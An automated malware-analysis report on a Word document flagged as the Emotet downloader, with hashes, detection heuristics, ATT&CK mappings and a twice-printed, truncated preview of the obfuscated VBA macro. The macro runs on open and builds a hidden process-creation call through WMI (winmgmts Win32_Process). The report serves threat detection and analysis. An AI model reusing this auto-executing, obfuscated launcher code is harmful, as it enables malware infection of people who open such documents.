Emotet Office (OLE) malware analysis — malicious · e29bf3fb7c00e54e

MALICIOUS

Office (OLE)

130.6 KB Created: 2019-05-28 11:20:00 Authoring application: Microsoft Office Word First seen: 2019-08-04

MD5: eddb165ed8c34d405d0938f88d0f78c2 SHA-1: bc6c5fdba4af3375df5e34feb518c60ae90e6306 SHA-256: e29bf3fb7c00e54eb2039a6e93a709147acbe0449e28b94a9a7458da26f718b7

222 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample contains a VBA macro with an autoopen subroutine, which is a common technique for Emotet. The macro is designed to execute code upon opening, likely to download and run a second-stage payload. The ClamAV detection explicitly identifies it as Emotet, a known downloader family.

Heuristics 7

ClamAV: Doc.Downloader.Emotet-10001946-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5615 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5615 bytes
SHA-256: `b71b3d77a6220722fc26f734d9ded2e4f82f5b95caabc783778088f61797d65d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "noh0obR0, 0, 0, MSForms, ComboBox" Attribute VB_Control = "HU10X6p, 1, 1, MSForms, ComboBox" Attribute VB_Control = "E1jcPr_A, 2, 2, MSForms, ComboBox" Sub _ autoopen( _ ) Debug.Print "jmKnYHL" + ("uiTwOU8l") + "QIPkN3" + "N9wJnbu" + "P71qO6U" + ("TPrk1u" + ("RVbB9wpv")) Debug.Print "Ku33Dr6" + ("EjFO6VI") + "jqHD6wH" + "UVKL6S" + ("aOjM_p" + "HSOHjq") NMfRGX7 Debug.Print "UKDl4X" + ("pn6wvozI") + "nR3EZj" + "z24ljHc" + "qoh4JaWD" + ("rrr8tJG" + ("TTwhwb")) Debug.Print "vNDzV9" + ("ZOUl2fBc") + "nP5Jbc0V" + "DGwbtQb" + ("cftz0O7z" + "tSTWzr") End Sub Attribute VB_Name = "h_64hH" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "zZKM3BS" Attribute VB_Name = "incpbD" Attribute VB_Name = "wWuAHR" Attribute VB_Name = "lmbusKmi" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "BLz5Kr7" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "pfm9cj" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "T4vDT7z_" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "SKlzDf" Function NMfRGX7() sd5pqz = ThisDocument.HU10X6p + ThisDocument.E1jcPr_A + ThisDocument.noh0obR0 Debug.Print "jh4rtV" + ("KK2TlFc") + "sjG7oERD" + "uQEPz4mi" + "tlhVsWwX" + ("Fh5ui5s" + ("XlnFd6")) Debug.Print "wDa0hI" + ("N0vNRR") + "DwWWUr" + "Qj3HPf" + ("RO3Takj" + "kR69Fv") D1r1vWXk = "win" Debug.Print "Flhik1Kz" + ("WPjL8R") + "cmzbnjp" + "l5AkBE8" + "z5TjQz" + ("ZTjZ9P" + ("iF0p09")) Debug.Print "Ld7JcaLm" + ("QpGBV0bi") + "OMvpjVW" + "iR_EkRw5" + ("DH8iP7wH" + "zOi4ddBs") vP_wVGa0 = D1r1vWXk + "mgmts:Win32_Process" Debug.Print "S_pwpM_b" + ("YVMBUBT") + "fozBEw" + "S944Fc" + "wojJYLJ" + ("XTf16HDj" + ("Mh9kAj")) Debug.Print "YmjX4fX" + ("mhuaibQ") + "ibc1zXq" + "G9Ejlci" + ("KEbAdjvT" + "nvFs8i0") iELjniBd(vP_wVGa0).Create# sd5pqz, oMsmBPb, qAii6Xd, zS3zpE Debug.Print "KMlu3p" + ("hmzkmtf") + "FjsMrtr" + "M_rCYKzk" + "pzY46c" + ("ankdoH8" + ("z3jd6t")) Debug.Print "UpmNmwB" + ("Wktnwu") + "JYTwVk" + "v1sq34Fa" + ("obR5zi7" + "SqnIH3Pu") End Function Attribute VB_Name = "CFjOr0U" Function qAii6Xd() Debug.Print "VuiVwQS6" + ("bwut3711") + "Qq02BT" + "FzkfBb" + "rHD5XY" + ("TCbf6A" + ("P6XuwrU")) Debug.Print "IzSHCuS_" + ("lzhw8T") + "w40NGOJ" + "D_WIwj" + ("iE8VSI" + "v2owIb") D1r1vWXk = "win" Debug.Print "sU6frda" + ("V4BcRIU") + "znA39Q" + "FEaiXmz" + "wUZSfF" + ("E58iHN" + ("z5dp0Xp")) Debug.Print "TWOECQ" + ("JK_C8fi") + "tWQ902K" + "lWJHlqH" + ("mwMDou" + "CPkAY7rY") vP_wVGa0 = D1r1vWXk + "mgmts:Win32_Process" + "Startup" Debug.Print "SsIwLM" + ("Qd71Kn") + "QWnnwJT" + "QUT8uZzk" + "amQ ... (truncated)

SHA-256: b71b3d77a6220722fc26f734d9ded2e4f82f5b95caabc783778088f61797d65d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "noh0obR0, 0, 0, MSForms, ComboBox"
Attribute VB_Control = "HU10X6p, 1, 1, MSForms, ComboBox"
Attribute VB_Control = "E1jcPr_A, 2, 2, MSForms, ComboBox"
Sub _
autoopen( _
)
   Debug.Print "jmKnYHL" + ("uiTwOU8l") + "QIPkN3" + "N9wJnbu" + "P71qO6U" + ("TPrk1u" + ("RVbB9wpv"))
Debug.Print "Ku33Dr6" + ("EjFO6VI") + "jqHD6wH" + "UVKL6S" + ("aOjM_p" + "HSOHjq")
NMfRGX7
   Debug.Print "UKDl4X" + ("pn6wvozI") + "nR3EZj" + "z24ljHc" + "qoh4JaWD" + ("rrr8tJG" + ("TTwhwb"))
Debug.Print "vNDzV9" + ("ZOUl2fBc") + "nP5Jbc0V" + "DGwbtQb" + ("cftz0O7z" + "tSTWzr")
End Sub


Attribute VB_Name = "h_64hH"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "zZKM3BS"

Attribute VB_Name = "incpbD"

Attribute VB_Name = "wWuAHR"

Attribute VB_Name = "lmbusKmi"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "BLz5Kr7"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "pfm9cj"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "T4vDT7z_"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "SKlzDf"
Function NMfRGX7()
sd5pqz = ThisDocument.HU10X6p + ThisDocument.E1jcPr_A + ThisDocument.noh0obR0
   Debug.Print "jh4rtV" + ("KK2TlFc") + "sjG7oERD" + "uQEPz4mi" + "tlhVsWwX" + ("Fh5ui5s" + ("XlnFd6"))
Debug.Print "wDa0hI" + ("N0vNRR") + "DwWWUr" + "Qj3HPf" + ("RO3Takj" + "kR69Fv")
D1r1vWXk = "win"
   Debug.Print "Flhik1Kz" + ("WPjL8R") + "cmzbnjp" + "l5AkBE8" + "z5TjQz" + ("ZTjZ9P" + ("iF0p09"))
Debug.Print "Ld7JcaLm" + ("QpGBV0bi") + "OMvpjVW" + "iR_EkRw5" + ("DH8iP7wH" + "zOi4ddBs")
vP_wVGa0 = D1r1vWXk + "mgmts:Win32_Process"
   Debug.Print "S_pwpM_b" + ("YVMBUBT") + "fozBEw" + "S944Fc" + "wojJYLJ" + ("XTf16HDj" + ("Mh9kAj"))
Debug.Print "YmjX4fX" + ("mhuaibQ") + "ibc1zXq" + "G9Ejlci" + ("KEbAdjvT" + "nvFs8i0")
iELjniBd(vP_wVGa0).Create# sd5pqz, oMsmBPb, qAii6Xd, zS3zpE
   Debug.Print "KMlu3p" + ("hmzkmtf") + "FjsMrtr" + "M_rCYKzk" + "pzY46c" + ("ankdoH8" + ("z3jd6t"))
Debug.Print "UpmNmwB" + ("Wktnwu") + "JYTwVk" + "v1sq34Fa" + ("obR5zi7" + "SqnIH3Pu")
End Function

Attribute VB_Name = "CFjOr0U"
Function qAii6Xd()
   Debug.Print "VuiVwQS6" + ("bwut3711") + "Qq02BT" + "FzkfBb" + "rHD5XY" + ("TCbf6A" + ("P6XuwrU"))
Debug.Print "IzSHCuS_" + ("lzhw8T") + "w40NGOJ" + "D_WIwj" + ("iE8VSI" + "v2owIb")
D1r1vWXk = "win"
   Debug.Print "sU6frda" + ("V4BcRIU") + "znA39Q" + "FEaiXmz" + "wUZSfF" + ("E58iHN" + ("z5dp0Xp"))
Debug.Print "TWOECQ" + ("JK_C8fi") + "tWQ902K" + "lWJHlqH" + ("mwMDou" + "CPkAY7rY")
vP_wVGa0 = D1r1vWXk + "mgmts:Win32_Process" + "Startup"
   Debug.Print "SsIwLM" + ("Qd71Kn") + "QWnnwJT" + "QUT8uZzk" + "amQ
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.